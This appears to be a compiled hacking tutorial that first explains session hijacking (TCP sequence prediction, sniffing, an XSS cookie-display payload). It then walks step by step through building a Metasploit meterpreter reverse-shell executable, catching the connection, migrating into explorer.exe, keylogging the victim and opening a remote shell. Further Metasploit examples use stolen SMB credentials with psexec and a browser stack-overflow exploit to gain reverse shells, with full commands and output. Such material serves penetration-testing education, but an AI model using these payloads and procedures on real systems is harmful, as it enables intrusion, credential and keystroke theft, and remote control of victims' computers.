Embed Size (px)
Citation preview
Page | 1
SESSION HIJACKING
Before Understanding Session Hijacking, first of all we need to understand What is Session?
What is a Session?
Session is semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting,
between two or more communicating devices, or between a computer and user.
Why are they needed?
Sessions are generally needed to ease authenticated communication between two or more parties. All the nodes, are not
required to authenticate for every activity or action, because of the session which exists.
Types of Session Hijacking:
Active Session Hijacking
Passive Session Hijacking
Active Session Hijacking:
Active session Hijacking involves hijacking a already authenticated session.
Active Session Hijacking means that original user has logged in his account or profile and then attacker steal the cookies
to hijack the active session and then disconnect the original user from the server.
WORKING:
In Active Session Hijacking, attackers use client side scripts to steal the original users cookies by involving social
engineering tactics which includes emails, private messaging on forums and on other social networking websites.
Why we call it active session hijacking because attackers need to interact and need some actions to be performed by the
victim to steal the session successfully which can raise the suspicion level.
Passive Session Hijacking:
In passive session hijacking attackers does not hijack active session instead they capture the login credentials while the
original user is trying to establish a new connection with the server, and attacker is sitting silently on the same network
and recording the login credentials.
WORKING:
Passive Session Hijacking involves the use of network sniffing tools that captures data packet and exploit the
vulnerability of ARP protocol by poisoning the network. Attackers analyze those captured data to retrieve login
credentials of the user.
Why we call it passive session hijacking because attackers does not need to interact with the user and make him perform
any specific actions. There is less risk of suspicion level.
3 Way Handshake in action:
User[192.168.0.105] initiated a connection with the server [66.220.153.11]. User sends a packet to the server with the
‘SYN’ bit set.
The server receives this packet and sends back a packet with the SYN bit and an ISN (Initial Sequence Number) for the
server.
User sets the ACK bit acknowledging the receipt of the packet and increments the sequence number by 1.
The two machines have successfully established a session.
Page | 2
TCP Session Hijacking:
TCP Hijacking is oldest type of session hijacking. TCP session hijacking actually deals with the successful prediction of the
Initial sequence numbers that gets exchanged between two host. A client and the server.
Sequence Numbers are exchanged during TCP Three way handshaking.
Host A sends a SYN bit set packet to Host B to create a new connection.
Host B will reply with SYN/ACK bits set packet to Host A with a initial sequence number.
Host A will reply with ACK bit set packet to Host B with Initial Sequence Number + 1
So, If attackers manage to predict the initial sequence number then they can actually send the last ACK data packet to the
server, spoofing as original Host. then they can hijack the TCP Connection.
Methods of TCP Session Hijacking:
Now before predicting a initial sequence number of a TCP three way handshaking, attackers need to be in between the client
and server to successfully hijack the TCP connection, for which attacker can actually use these three techniques.
Source routing: attacker can actually use source routing in such a way that the data is being transferred between client and
server through attacker. In that case attacker can see the data being exchanged and can see the Initial Sequence Number.
Man in the middle attack: By Logically placing himself between the server and client, an attacker can similarly see the
data connection going through him.
Attacker can also use ICMP redirect to spoof himself as gateways so that data can be passed through him.
Attacker can also hijack the TCP session by not predicting or looking for initial sequence number instead he can let the
user establish a successful connection and then spoofing himself as a client by changing his MAC address with that of the
original Host, attacker can send RST bit set to the server to reset the connection and starting a whole new connection from
TCP three way handshaking and exchanging the new sequence numbers.
Page | 3
SESSION HIJACKING ATTACK
Description
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is
normally managed for a session token.
Because http communication uses many different TCP connections, the web server needs a method to recognize
every user’s connections. The most useful method depends on a token that the Web Server sends to the client
browser after a successful client authentication. A session token is normally composed of a string of variable
width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in
other parts of the header of the http request, or yet in the body of the http requisition.
The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to
gain unauthorized access to the Web Server.
The session token could be compromised in different ways; the most common are:
Predictable session token;
Session Sniffing;
Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
Man-in-the-middle attack
Man-in-the-browser attack
Page | 4
Examples
Example 1
Session Sniffing
In the example, as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”,
then he uses the valid token session to gain unauthorized access to the Web Server.
Figure 2. Manipulating the token session executing the session hijacking attack.
Example 2
Cross-site script attack
The attacker can compromise the session token by using malicious code or programs running at the client-side.
The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a
crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run
and complete the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the
cookie value of the current session; using the same technique it's possible to create a specific JavaScript code that
will send the cookie to the attacker.
<SCRIPT>alert(document.cookie);</SCRIPT>
Page | 5
Figure 3. Code injection.
References
http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm
http://en.wikipedia.org/wiki/HTTP_cookie
Page | 6
METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised
computer little difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal).
Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V.
Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the
windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools
required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're
comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it
on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx
Page | 7
First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework
Version 3>>msfconsole
You should now be having a shell something similar to a command prompt in windows.
Page | 8
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter
payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the
bottom left corner of the window)
root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip”
LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Page | 9
Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler
Page | 10
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
Page | 11
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400
2011
You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Page | 12
Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Page | 13
Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>
Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Page | 14
Dumping captured keystrokes...
GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you
own.
About Author : This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH
Certified Ethical Hacker. His main expertise include Privacy Issues online, Web Application Security and
Wireless Hacking. You can connect with him on facebook here.
Working with Active and Passive Exploits in Metasploit
Metasploit Fundamentals
All exploits in the Metasploit Framework will fall into two categories: active and passive.
Active Exploits
Active exploits will exploit a specific host, run until completion, and then exit.
Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered.
Page | 15
You can force an active module to the background by passing ‘-j’ to the exploit command:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
Example
The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
Microsoft Windows XP [Version 5.1.2600]
Page | 16
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Passive Exploits
Passive exploits wait for incoming hosts and exploit them as they connect.
Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.
They can also be used in conjunction with email exploits, waiting for connections. Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to
the sessions command. Passing ‘-i’ will interact with a shell.
msf exploit(ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Example
The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
Page | 17
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>
